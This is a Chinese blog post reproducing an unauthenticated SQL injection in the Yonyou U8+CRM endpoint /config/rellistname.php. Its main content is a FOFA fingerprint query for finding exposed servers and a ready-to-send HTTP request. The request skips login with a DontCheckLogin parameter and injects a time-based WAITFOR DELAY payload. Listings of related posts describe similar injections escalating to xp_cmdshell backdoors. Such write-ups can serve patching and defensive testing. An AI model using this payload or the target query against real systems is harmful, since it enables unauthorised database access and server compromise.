【漏洞复现】|用友U8-CRM接口rellistname.php存在SQL注入漏洞

最新推荐文章于 2025-05-21 10:06:34 发布
最新推荐文章于 2025-05-21 10:06:34 发布
阅读量283 收藏 1
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/IDHALASHAO/article/details/144325295

漏洞描述

用友U8+CRM /config/rellistname.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。

资产概要    

body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM"

漏洞复现   

GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:5'--+- HTTP/1.1
Host: 
Cookie: PHPSESSID=bgsesstimeout-;

免责声明 

本文分享的漏洞POC及相关技术仅限学习和自查用途,请勿用于非法测试或其他不当行为。传播或利用本文及相关工具所导致的任何直接或间接后果,包括法律责任和不良影响,均由使用者自行承担,文章作者概不负责。如内容涉及侵权问题,请及时联系,作者将迅速处理并致以歉意。此外,工具来源于网络,安全性需用户自行验证。感谢您的理解与支持!   

用友U8 CRM exportdictionary.php SQL注入漏洞复现
0xSec
08-30 1477
用友U8CRM客户关系管理系统exportdictionary.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
SRM智联云采系统quickReceiptDetail存在SQL注入漏洞
缘梦未来的博客
11-22 211
智联云采SRM重构供应链 采购更简单 针对企业供应链采购管理难题及数字化转型需求,智联云采依托人工智能、物联网、大数据、云等前沿技术,沉淀产品系统化方案,帮助企业实现战略寻源更具预测性。
用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入
最新发布
swordheart的博客
05-21 503
用友U8-CRM系统接口eventseteventsetlist.php存在SQL注入,未经身份验证的攻击者可执行任意SQL语句。
用友U8-CRM rellistname Sql注入漏洞复现
iSee857的博客
12-10 606
推出的一款客户关系管理软件,旨在帮助企业实现客户信息的集中管理和共享利用,提升客户满意度和企业运营效率。用友CRM主要面向中小企业,提供全面的客户关系管理解决方案,涵盖客户管理、销售管理、项目管理等功能‌。Fofa:body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM",未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。厂商已发布补丁 请即时修复。
用友畅捷通CRM存在SQL注入漏洞(已修复)
无问社区的博客
12-27 689
用友畅捷通T-CRM用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力。畅捷CRM系统new***存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。修复建议:对参数进行过滤,防止 sql建议升级到最新版本。
用友U8 CRM config/rellistname.php SQL注入漏洞复现
0xSec
08-31 867
用友U8CRM客户关系管理系统config/rellistname.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友U8 CRM ajax/chkService.php SQL注入漏洞复现
0xSec
09-09 572
用友U8CRM客户关系管理系统/ajax/chkService.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友U8 CRM config/fillbacksettingedit.php SQL注入漏洞复现
0xSec
09-26 905
用友 U8 CRM客户关系管理系统 config/fillbacksettingedit.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友U8 CRM config/fillbacksetting.php SQL注入漏洞复现
0xSec
09-26 619
用友U8CRM客户关系管理系统config/fillbacksetting.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友U8 CRM reservationcomplete.php SQL注入致RCE漏洞复现
0xSec
07-26 1747
用友U8CRM客户关系管理系统reservationcomplete.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友时空KSOA sKeyvalue SQL注入漏洞复现
Keepb1ue的博客
12-29 960
用友KSOA是用友集团推出的一款基于SOA架构的企业级应用平台,旨在为企业提供全面的信息化解决方案。它包括了多个模块,如财务管理、人力资源管理、供应链管理等,可以帮助企业实现数字化转型。它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
漏洞复现用友-移动系统管理-backup-sql注入
知黑而守白
01-26 167
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理 backup 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现用友时空KSOA sKeyvalue参数存在SQL注入漏洞
qq_34780861的博客
04-01 500
用友时空KSOA平台sKeyvalue参数存在SQL注入漏洞
用友U8 Cloud ReleaseRepMngAction SQL注入漏洞复现(CNVD-2024-33023)(附脚本)
iSee857的博客
12-20 317
用友U8 Cloud在调用ReleaseRepMngAction 产生sql注入漏洞,该漏洞攻击者可以通过对接口参数进行特定的SQL请求构造实现注入,利用系统SQL注入漏洞获取数据库中的敏感信息。
用友U8 CRM 多个接口存在SQL注入漏洞
m0_46604997的博客
09-27 1391
用友U8 CRM客户关系管理系统多个接口存在SQL注入漏洞,攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露,更严重的是数据库服务器控制有很大风险被攻击者控制等相关安全问题。
用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
0xSec
01-30 638
用友GRP-U8R10行政事业内控管理软件forgetPassword_old.jsp接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友U8-Cloud api/hr接口存在SQL注入漏洞复现
m0_50488257的博客
05-09 757
在公众号上看见有人分享了U8-Cloud漏洞,看发布日期很新,再加上前几天刚弄过一个U8-Cloud站点,复现了看看。放包,发现sqlserver的版本信息。
Goby 漏洞发布|用友-UFIDA-NC /portal/pt/oacoSchedulerEvents/isAgentLimit SQL 注入漏洞
m0_46699477的博客
06-12 543
用友NC是一套全面的企业资源规划软件解决方案,用于管理企业的各个方面,包括财务、人力资源、供应链、生产和销售等。用友NC /portal/pt/oacoSchedulerEvents/isAgentLimit 存在SQL注入漏洞,攻击者可通过该漏洞在服务器端写⼊后⻔,获取服务器权限,进⽽控制整个web服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值